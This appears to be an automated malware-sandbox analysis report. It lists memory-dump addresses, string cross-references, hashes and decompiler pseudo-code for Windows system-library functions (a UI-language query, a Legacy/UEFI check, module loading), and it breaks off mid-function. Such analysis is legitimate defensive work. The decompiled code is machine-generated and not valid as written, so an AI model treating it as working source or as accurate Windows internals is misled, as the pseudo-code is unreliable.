0x1e41bdfe
0x1e41be06
0x1e41be0b
0x1e41be0d
0x1e41be0f
0x1e41be14
0x1e41be19
0x1e41be20
0x1e41be25
0x1e41be27
0x1e41be35
0x1e41be39
0x1e41be46
0x1e41be4f
0x1e41be54
0x1e41be56
0x1e41bef8
0x1e41bef8
0x00000000
0x1e41be5c
0x1e41be5c
0x1e41be60
0x00000000
0x1e41be66
0x1e41be66
0x1e41be7f
0x1e41be84
0x1e41be87
0x1e41be89
0x1e41be8b
0x1e41be99
0x1e41be9d
0x1e41bea0
0x1e41beac
0x1e41beaf
0x1e41beb1
0x1e41beb3
0x1e41beb3
0x00000000
0x1e41bea2
0x1e41bea2
0x00000000
0x1e41bea2
0x1e41be8d
0x1e41be8d
0x1e41be92
0x00000000
0x1e41be92
0x1e41be8b
0x1e41be60
0x1e41be3b
0x1e41be3b
0x1e41be3e
0x00000000
0x1e41be40
0x1e41be40
0x1e41be44
0x00000000
0x00000000
0x00000000
0x00000000
0x1e41be44
0x1e41be3e
0x1e41be29
0x1e41be29
0x00000000
0x1e41be29
0x1e41be27
0x00000000
0x1e3dfba7
0x1e3dfba7
0x1e3dfbab
0x1e41bf02
0x1e3dfbb1
0x1e3dfbb1
0x1e3dfbb8
0x1e3dfbbd
0x1e3dfbbd
0x1e3dfbbf
0x1e3dfbbf
0x1e3dfbc5
0x1e3dfbcb
0x1e3dfbf8
0x1e3dfbf8
0x1e3dfbfa
0x00000000
0x1e3dfc00
0x1e3dfc00
0x1e3dfc03
0x00000000
0x1e3dfc09
0x1e3dfc09
0x1e3dfc0f
0x1e3dfc15
0x1e3dfc23
0x1e3dfc23
0x1e3dfc25
0x1e3dfc27
0x1e3dfc75
0x1e3dfc7c
0x1e3dfc84
0x00000000
0x1e3dfc29
0x1e3dfc29
0x1e3dfc2d
0x1e3dfc30
0x1e41bf0f
0x00000000
0x1e3dfc36
0x1e3dfc38
0x1e3dfc3b
0x1e3dfc41
0x1e41bf17
0x1e41bf19
0x1e41bf48
0x1e41bf4b
0x00000000
0x1e41bf1b
0x1e41bf22
0x1e41bf24
0x1e41bf26
0x00000000
0x1e41bf2c
0x1e41bf37
0x1e41bf39
0x1e41bf3b
0x00000000
0x1e41bf41
0x1e41bf41
0x1e41bf41
0x1e41bf41
0x1e41bf45
0x00000000
0x1e41bf45
0x1e41bf3b
0x1e41bf26
0x00000000
0x1e3dfc47
0x1e3dfc47
0x1e3dfc49
0x1e3dfcb2
0x1e3dfcb4
0x1e3dfcb6
0x1e3dfcdc
0x1e3dfcdc
0x00000000
0x1e3dfcb8
0x1e3dfcc3
0x1e3dfcc5
0x1e3dfcc7
0x00000000
0x1e3dfcc9
0x1e3dfcc9
0x1e3dfccd
0x00000000
0x1e3dfccd
0x1e3dfcc7
0x00000000
0x1e3dfc4b
0x1e3dfc4b
0x1e3dfc4e
0x1e3dfc4e
0x1e3dfc51
0x1e3dfc51
0x1e3dfc54
0x1e3dfc5a
0x1e3dfc5c
0x1e3dfc5f
0x1e3dfc61
0x1e3dfc63
0x1e3dfc65
0x1e3dfc67
0x1e3dfc6e
0x1e3dfc72
0x1e3dfc72
0x1e3dfc72
0x1e3dfc72
0x1e3dfc67
0x1e3dfc61
0x00000000
0x1e3dfc5a
0x1e3dfc49
0x1e3dfc41
0x1e3dfc30
0x1e3dfc27
0x1e3dfc03
0x1e3dfbcd
0x1e3dfbd3
0x1e3dfbd9
0x1e3dfbdc
0x1e3dfbde
0x1e3dfc99
0x1e3dfc9b
0x1e3dfc9d
0x1e3dfcd5
0x1e3dfcd5
0x1e3dfc89
0x1e3dfc89
0x00000000
0x1e3dfc9f
0x1e3dfc9f
0x1e3dfca3
0x00000000
0x1e3dfca3
0x00000000
0x1e3dfbe4
0x1e3dfbe4
0x1e3dfbe4
0x1e3dfbe4
0x1e3dfbe9
0x1e3dfbf2
0x00000000
0x1e3dfbf2
0x1e3dfbde
0x1e3dfbcb
0x1e3dfbab
0x1e3dfc8b
0x1e3dfc8b
0x1e3dfc8c
0x1e3dfb80
0x1e3dfb72
0x1e3dfb5e
0x1e3dfc8d
0x1e3dfc91
0x1e3dfadf
0x1e3dfadf
0x1e3dfae1
0x1e3dfae4
0x1e3dfae7
0x1e3dfaec
0x1e3dfaf8
0x1e3dfb00
0x1e3dfb07
0x1e3dfb0f
0x1e3dfb0f
0x1e3dfb07
0x00000000
0x1e3dfaf8
0x1e3dfadd

Strings

1p, xrefs: 1E3DFAF1
*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 1E41BE0F

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$1p
API String ID: 0-2027563773
Opcode ID: 130fa72df6b89c057e6accb7f25944ae19258354ef0631e4fd213e796d5ea57d
Instruction ID: 8e2efcf2efca87c14c18493927cfadc4e28412aadb0aa79363c4e08d11cba531
Opcode Fuzzy Hash: 130fa72df6b89c057e6accb7f25944ae19258354ef0631e4fd213e796d5ea57d
Instruction Fuzzy Hash: 64A12876B00746CBDB15CF65C4907AA73A6BF48714F41476EE846DB780DB30E989CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E4251BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1E4251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x1e4805f0);
				E1E3FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E1E3BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E1E4253CA(0);
						return E1E3FD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E1E3EF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E1E3C3690(1, _t117, 0x1e381810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E1E3EAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L1E3C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E1E3EAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E1E42500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E1E3E9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x1e4251be
0x1e4251c3
0x1e4251c8
0x1e4251cd
0x1e4251d0
0x1e4251d3
0x1e4251d8
0x1e4251db
0x1e4251de
0x1e4251e0
0x1e4251e3
0x1e4251e6
0x1e4251e8
0x1e425342
0x1e425351
0x1e425356
0x1e42535a
0x1e425360
0x1e425363
0x1e425366
0x1e425369
0x1e425369
0x1e42536b
0x1e42536b
0x1e425370
0x1e4253a3
0x1e4253a4
0x1e4253a6
0x1e4253ab
0x1e4253ab
0x1e4253ae
0x1e4253ae
0x1e4253b5
0x1e4253bf
0x1e4253bf
0x1e425375
0x1e425396
0x1e4253a0
0x1e4253a0
0x00000000
0x1e425396
0x1e425377
0x1e425379
0x1e42537f
0x1e42538c
0x1e425390
0x00000000
0x1e425390
0x1e4251ee
0x1e4251f1
0x1e425301
0x1e425310
0x1e425315
0x1e425318
0x1e42531b
0x1e425320
0x1e42532e
0x1e425331
0x00000000
0x1e425331
0x1e425328
0x1e425329
0x00000000
0x1e425329
0x1e4251fa
0x1e425235
0x1e425236
0x1e425239
0x1e42523f
0x1e425240
0x1e425241
0x1e425242
0x1e425246
0x1e425247
0x1e42524e
0x1e425251
0x1e425267
0x1e425269
0x1e42526e
0x1e42527d
0x1e42527e
0x1e425281
0x1e425282
0x1e425287
0x1e425288
0x1e42528a
0x1e42528f
0x1e425294
0x00000000
0x00000000
0x1e42529a
0x1e42529c
0x1e42529e
0x1e42529e
0x1e4252a4
0x1e4252b0
0x00000000
0x00000000
0x1e4252ba
0x1e4252bc
0x1e4252bc
0x1e4252d4
0x1e4252d9
0x1e4252dc
0x1e4252e1
0x00000000
0x00000000
0x1e4252e7
0x1e4252f4
0x00000000
0x1e4252f4
0x1e425270
0x00000000
0x1e425270
0x1e4251fc
0x1e4251fd
0x1e425202
0x1e425203
0x1e425205
0x1e42520a
0x1e42520f
0x00000000
0x00000000
0x1e42521b
0x1e425226
0x1e42522b
0x1e42521d
0x1e42521d
0x1e425222
0x1e425222
0x1e42522d
0x00000000

Strings

Legacy, xrefs: 1E425226
UEFI, xrefs: 1E42521D

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: d0a8259729a36ef3f2c1fcb7bbe716bccaa6dc55ccde37bee8c6111265969a3c
Instruction ID: 996b33d0e0a09b48584026de14506b2b6952ced92f17e1ba9de301704429db63
Opcode Fuzzy Hash: d0a8259729a36ef3f2c1fcb7bbe716bccaa6dc55ccde37bee8c6111265969a3c
Instruction Fuzzy Hash: C8519DB1D0060A9FDB14CFA9D850BADB7F9BF48300F50862EE54AEB281D775A901CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3BD5E0, Relevance: 1.9, APIs: 1, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E1E3BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1e49d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E1E3B6600(0x1e4952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1e497b9c; // 0x0
							_t281 = L1E3C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E1E3EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1e497b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1e497b8c; // 0x702a98
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E1E3C2280(_t200, 0x1e4984d8);
									_t277 =  *0x1e4985f4; // 0x7040b8
									_t351 =  *0x1e4985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x704050
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E1E3BFFB0(_t287, _t353, 0x1e4984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E1E3FCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E1E3B6600(0x1e4952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E1E3B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1e49b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E1E42E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1e498472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x1e49b218; // 0x0
														asm("ror edi, cl");
														 *0x1e49b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E1E3C2280(_t250, 0x1e4984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L1E3E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E1E3BFFB0(_t293, _t353, 0x1e4984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E1E3E37F5(_t353, 0);
																}
																E1E3E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E1E3D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E1E3D02D6(_t174);
																}
																L1E3C77F0( *0x1e497b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E1E3DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L1E3BEC7F(_t353);
										L1E3D19B8(_t287, 0, _t353, 0);
										_t200 = E1E3AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E1E3EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x1e49b2f8; // 0x0
									if((_t206 |  *0x1e49b2fc) == 0 || ( *0x1e49b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x1e49b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E1E456B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E1E456AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E1E3BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L1E3BEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E1E3E9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E1E3BE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L1E3B8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1E3E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
